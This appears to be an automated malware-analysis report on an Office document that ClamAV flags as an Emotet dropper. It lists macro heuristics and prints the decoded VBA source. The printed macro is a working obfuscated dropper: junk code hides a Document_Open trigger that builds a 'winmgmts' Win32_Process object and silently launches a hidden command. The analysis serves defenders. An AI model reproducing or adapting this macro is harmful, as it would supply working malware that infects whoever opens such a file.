MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Emotet-7546199-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-7546199-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Huuoserwq = GetObject(Dnlbrvlmi) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8180 bytes |
SHA-256: d7b0dff802b87609ec75ab459632a24fc9837b0e96d838b71142518eaa405eda |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
208 of 303 identifiers look randomly generated (e.g. 'Ssijygmqobgfk'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Brksqxht"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Nqoahvljqksr
End Sub
Attribute VB_Name = "Rontevfyd"
Attribute VB_Base = "0{639D43C7-5467-44F5-92CD-39FE69D9E6E8}{D367A484-EAC5-4C14-8826-4AAC7B1C0491}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Xdhtssoxjxl"
Function Vyzdaskogf()
Select Case Mwjmkbevpi
Case Ukoaldyenyei
Qilemlfmwkq = 7
Fnjisdtohts = Atn(4)
Qpworarvlvj = Sin(Tohnekymtqepm)
Case Aiospyvq
Tpvvtrzyv = Log(3)
Gupirbwzr = 6
Vpudgrvyy = CSng(Fkucrzyfrqww)
Case Zjxwyqyjoug
Kicxkgooeop = ChrW(Amhoysaphhycz)
Wwavqjnxoslp = 1
Uvhlbqlbzvnza = Cos(Evlzusio)
End Select
Jfxcszci = ChrW(wdKeyP)
Select Case Yhbxcpjbe
Case Vzwapklge
Mrnprghk = 7
Aekczgajz = Atn(4)
Koaxpyexk = Sin(Nxvjkmxdu)
Case Zvulyqdlxei
Dmscicnb = Log(3)
Qmgqwnlwsmvo = 6
Dzouyodf = CSng(Fxtuurgogdez)
Case Gyliqhgp
Ziosceoljol = ChrW(Qbaghhaxeion)
Upvmppdv = 1
Olcotpdp = Cos(Uhpbzihsv)
End Select
Fulnjdguw = Jfxcszci + Rontevfyd.Inrjxrsimz + Rontevfyd.Xjxslbcw
Select Case Fhgiuhkj
Case Xurckcjnbh
Wjfqxaqze = 7
Rurzjmoigjph = Atn(4)
Rxktdggrzl = Sin(Ekksehrc)
Case Tczanyfwh
Fgcgfazlz = Log(3)
Dgidyoehp = 6
Jehudtilde = CSng(Ydhlyhsrbmnzs)
Case Zrrznivwyy
Fcnrbiijarcgz = ChrW(Jwribkkju)
Gpdgjmnkm = 1
Vlqkiihplzq = Cos(Ahqjmvstfx)
End Select
losd = Rontevfyd.Chphtxkp.GroupName
Wxbspagjl = Split(Fulnjdguw + LTrim(losd), "//====dsfnnJJJsm388//=")
Select Case Hayloxff
Case Blncsfctnrpm
Rkhoivyddoff = 7
Dvovaxcol = Atn(4)
Agbvkkuret = Sin(Qxpwyiyxnkx)
Case Cummrdzxfiow
Ekoqlafyxkae = Log(3)
Mvpildhpif = 6
Dskpazrpumy = CSng(Pmexblnxmk)
Case Gldlobjcvwmn
Amqszxuvvq = ChrW(Gtasqhawuone)
Psrtarprka = 1
Kmykpmiwvpcc = Cos(Mlpmylmph)
End Select
Vyzdaskogf = Clhtrwrlxlfqs + Join(Wxbspagjl, "") + Clhtrwrlxlfqs
Select Case Gpwkdfewxj
Case Apstwebuholbb
Nqoztljakqz = 7
Kemsoofkxp = Atn(4)
Vjerevjlqr = Sin(Kwmqoidxj)
Case Dcsnnnfpbs
Bfifuqjttzdir = Log(3)
Volzzdyaplh = 6
Lbeqtykkgdiga = CSng(Dykvlyjaptqu)
Case Ttnulirvn
Qepldszfgxqb = ChrW(Zbaoxcdhfm)
Lopailvcuttp = 1
Rpwhcsbk = Cos(Qgqmpjzcc)
End Select
End Function
Function Nqoahvljqksr()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Rontevfyd.Tghnzxczsfi + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
Select Case Zbroyruhnrws
Case Ffqxmfxfi
Ozrnhnir = 7
Xgofwzwzmfmy = Atn(4)
Slkagutsgnksc = Sin(Doaeqhzcr)
Case Afwenqyru
Ilxxfzav = Log(3)
Dtjrmujrtitka = 6
Wcattlzjafp = CSng(Czbwljxmnmbw)
Case Bnjxkdjjxabkl
Jmwnqpthwz = ChrW(Bipzxelxvqied)
Bbuaxtdeaeiy = 1
Gmytgiaib = Cos(Zgoseskhw)
End Select
E = "//====dsfnnJJJsm388//="
Select Case Vzvqvcek
Case Ruyxenbccw
Kskwkwvqgz = 7
Gvutxpfgdd = Atn(4)
Tmfeouwxdloc = Sin(Rhpvdsjoqisie)
Case Shhlqcyrqblc
Vgsnyyxri = Log(3)
Kfvwmgqkgkd = 6
Ovsqytrpvhu = CSng(Ufotbzgx)
Case Cueuvshwszcyd
Soiyoxbul = ChrW(Vmjeathxpw)
Wxnlccywcimil = 1
Sabzsikwvmoyi = Cos(Plxombblz)
End Select
Wfitycfl = Split("//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=w//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=" + d + T, E)
Select Case Kvgdqtghrpvuy
Case Czpyxzskmxt
Gvcnaxfdsfvvr = 7
Bbttelbqbor = Atn(4)
Ktfxqjbwmiua = Sin(Juucgibjld)
Case Mefbziyntyzxf
Votzsfysvhl = Log(3)
Raicyqwwqlj = 6
Ltluwwyt = CSng(Sehunmjtnxiw)
Case Xzplseckoqt
Akpmwlepx = ChrW(Ijhsvnupbvxxh)
Bsiqqajf = 1
Yllknazis = Cos(Wkoawddldn)
End Select
Dnlbrvlmi = Join(Wfitycfl, "")
Select Case Hypdzvxwjwy
Case Cziwemkh
Fozsbhuywkay = 7
Fttjukgmx = Atn(4)
Ryobvsjo = Sin(Pacvopyctz)
Case Erlsanho
Uojjgwarrjv = Log(3)
Tqnfvikefzr = 6
Qcsvgprygomfj = CSng(Biuejarc)
Case Mghmooroj
Zvcgcrncbamfi = ChrW(Enlvzaeouikmr)
Raxdbnsxgjez = 1
Aaykrjedn = Cos(Vhixsfvdgjlhe)
End Select
Set Huuoserwq = GetObject(Dnlbrvlmi)
Select Case Piodpdvq
Case Ygrzrptjapkbw
Minpxffki = 7
Yeplwcovdiuhs = Atn(4)
Mjrpnmzxcu = Sin(Hqtwidvr)
Case Psinalwrbuak
Ssijygmqobgfk = Log(3)
Dwwxstyham = 6
Lsnzwxxd = CSng(Msihyeggvbkf)
Case Dnabukhwkfbya
Hmjvikeplv = ChrW(Urmrfuqv)
Vjfnqidfaedwn = 1
Jqnzxoga = Cos(Fxnwekgakrz)
End Select
Umhwjcyvyq = Rontevfyd.Matygofb.Tag
Bmcwdtqg = Dnlbrvlmi + ChrW(wdKeyS) + Rontevfyd.Olocpxenwtr.Tag + Umhwjcyvyq
Select Case Cwlkjlri
Case Mhbujzbltp
Qjoayiysyto = 7
Uijzzfobhotzg = Atn(4)
Fxxkoogc = Sin(Nikdnssaup)
Case Lujymiuuardv
Wenlognp = Log(3)
Dyuwbzmqmnlca = 6
Xhbjvfpq = CSng(Onjakewinuooy)
Case Fnizptdx
Ymgqroihamm = ChrW(Bjpunvnijii)
Gqxdlqzjmrqs = 1
Ghygocxhq = Cos(Pbvipexzairjw)
End Select
Spjksgmeepscf = Bmcwdtqg + Rontevfyd.Tghnzxczsfi
Select Case Dpstloipowlib
Case Mzwtqzsvetgcv
Ronedkmy = 7
Zidwrcurqphd = Atn(4)
Alunzemnknf = Sin(Wgoaaeaqqpyn)
Case Keptnkxdsp
Ngmxpruhxkbog = Log(3)
Zkvvaisb = 6
Trmxsnzbbqtet = CSng(Tjozcanog)
Case Wtyqvedbwahk
Cneijvqwogydb = ChrW(Gcgyzqfdkvpa)
Hmzjczni = 1
Ddafssscxgpxa = Cos(Fxkunuuzt)
End Select
Set Nqoahvljqksr = GetObject(Spjksgmeepscf)
Select Case Wkvyuhfdmgt
Case Abpjjcosgtj
Fvmegzhajmnl = 7
Xbxznxcjzxou = Atn(4)
Vpqlwdcjrizti = Sin(Pcxohqqjtveo)
Case Opmtkftvbprrn
Atpnrjuqfyg = Log(3)
Wqsogmcsn = 6
Kxtbixpcgttbo = CSng(Muzgvean)
Case Xdlahxntrc
Siiidyndodm = ChrW(Itgetkkv)
Tebzvgixyk = 1
Qymabzvx = Cos(Iazegoxsjuc)
End Select
Nqoahvljqksr. _
showwindow = False
Select Case Caecgqbw
Case Dipmyaxcibejv
Mszoidvshekdy = 7
Vqilmrqxah = Atn(4)
Uayseefu = Sin(Hosipihn)
Case Kzgnajnfvvzgk
Sjmgztxl = Log(3)
Utebiqmkzs = 6
Ksuqzzccbdrh = CSng(Vhyfmnmegqjdm)
Case Wlhgyytliu
Rhqbwejufm = ChrW(Hhglehvmx)
Sjbybbwpl = 1
Uwpomzdkh = Cos(Bzrrigbzllc)
End Select
Do While Huuoserwq. _
Create(pok & Vyzdaskogf, Kzxvdlfbqf, Nqoahvljqksr, Ddhmufor)
Loop
Select Case Fcchzhiauxnvm
Case Xqfektnjrhwc
Blzcknwvtub = 7
Oxbihgjpgec = Atn(4)
Sskzcfiks = Sin(Scjxbxkdwey)
Case Zpvqzvhwtev
Trvfevlnqe = Log(3)
Ojtzmatgua = 6
Slxeszxotr = CSng(Hracacjlyelm)
Case Hdbxqtemmtyhu
Itwfzrvaq = ChrW(Rcloalpvrtmv)
Ovegetisep = 1
Gofmdksxcca = Cos(Mrzzmwxvwlwq)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.